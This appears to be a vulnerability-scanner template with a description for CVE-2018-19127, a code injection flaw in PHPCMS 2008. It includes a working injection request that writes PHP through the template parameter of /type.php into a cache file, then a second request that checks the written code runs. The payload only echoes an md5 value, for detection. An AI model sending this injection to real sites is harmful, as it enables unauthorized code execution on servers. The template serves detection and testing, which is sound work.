A code injection vulnerability in /type.php in PHPCMS 2008 allows attackers to write arbitrary content to a website cache file with a controllable filename, leading to arbitrary code execution. The PHP code is sent via the template parameter, and is written to a data/cache_template/*.tpl.php file along with a "<?php function " substring.
PoC代码[已公开]
id: CVE-2018-19127
info:
name: PHPCMS 2008 Remote Code Execution
author: pa55w0rd
severity: critical
verified: false
description: |-
A code injection vulnerability in /type.php in PHPCMS 2008 allows attackers to write arbitrary content to a website cache file with a controllable filename, leading to arbitrary code execution. The PHP code is sent via the template parameter, and is written to a data/cache_template/*.tpl.php file along with a "<?php function " substring.
reference:
- https://www.exploit-db.com/exploits/46234
- https://nvd.nist.gov/vuln/detail/CVE-2018-19127
tags: cve,cve2018,phpcms,rce
created: 2023/08/10
set:
r: randomInt(800000000, 1000000000)
rules:
r0:
request:
method: GET
path: /type.php?template=tag_(){}%3b@unlink(file)%3becho md5($_GET[1])%3b{//../rss
follow_redirects: true
expression: response.status == 200
r1:
request:
method: GET
path: /data/cache_template/rss.tpl.php?1={{r}}
follow_redirects: true
expression: response.body.bcontains(bytes(md5(string(r))))
expression: r0() && r1()